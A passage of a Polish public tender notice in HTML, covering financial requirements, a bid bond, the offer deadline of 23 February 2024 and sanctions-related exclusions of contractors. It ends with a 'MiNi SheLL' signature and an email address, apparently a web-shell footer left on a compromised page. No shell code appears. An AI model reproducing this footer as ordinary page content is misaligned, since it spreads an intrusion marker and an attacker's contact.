dysponował odpowiednią sytuacją finansowo ekonomiczną poprzez posiadanie środków finansowych w wysokości co najmniej 1 000 000,00 zł (słownie: jeden milion złotych) lub posiadanie zdolności kredytowej w wysokości co najmniej 1 000 000,00 zł (słownie: jeden milion złotych). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawca, którego<br/>oferta zostanie najwyżej oceniona, nie będzie wezwany do złożenia podmiotowych środków dowodowych w celu wykazania braku<br/>podstaw wykluczenia z postępowania, o których mowa w Dziale V pkt 2 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W<br/>związku z bezpośrednim powiązaniem warunku udziału dotyczącego zdolności technicznej i zawodowej określonego w Dziale V pkt.<br/>3.2 SWZ oraz kryterium nr 2 na podstawie art. 126 ust 2 Ustawy PZP Zamawiający wzywa do złożenia wraz z ofertą wykazu osób,<br/>skierowanych przez Wykonawcę do realizacji zamówienia publicznego, a w szczególności odpowiedzialnych za świadczenie usług,<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami. Wzór wykazu osób stanowi załącznik nr 6 do SWZ. <br/>Pozostałe wymagania dotyczące podmiotowych środków dowodowych zostały zawarte w Dziale VII SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do niniejszego postępowania jest zobowiązany wnieść wadium o wartości 10.000,00 zł na<br/>czas związania ofertą.<br/>Szczegółowe informacje dotyczące wadium zostały zawarte w Dziale XIII SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały zawarte we Wzorze Umowy stanowiącym Załącznik<br/>nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Złożenie oferty wraz z oświadczeniem i innymi dokumentami wymienionymi w SWZ oraz jej wycofanie odbywa się przy użyciu platformy e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-23 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia, stosownie do art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego wyklucza się:<br/>2.3.1. Wykonawcę wymienionego w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006<br/>r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec<br/>Ukrainy zwanego dalej ,,rozporządzeniem 765/2006” i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w<br/>sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i<br/>niezależność Ukrainy lub im zagrażających, zwanego dalej ,,rozporządzeniem 269/2014&#39;&#39; albo wpisanego na listę osób i<br/>podmiotów, wobec których są stosowane środki, o których mowa w art. 1 ustawy wymienionej w ust.2, zwaną dalej „listą” na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww.<br/>ustawy;<br/>2.3.2. Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu<br/>praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu Rady<br/>765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego<br/>2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka,<br/>o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>2.3.3. Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o<br/>rachunkowości, jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu nr<br/>269//2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na<br/>listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww.<br/>ustawy.”

Creat By MiNi SheLL
Email: jattceo@gmail.com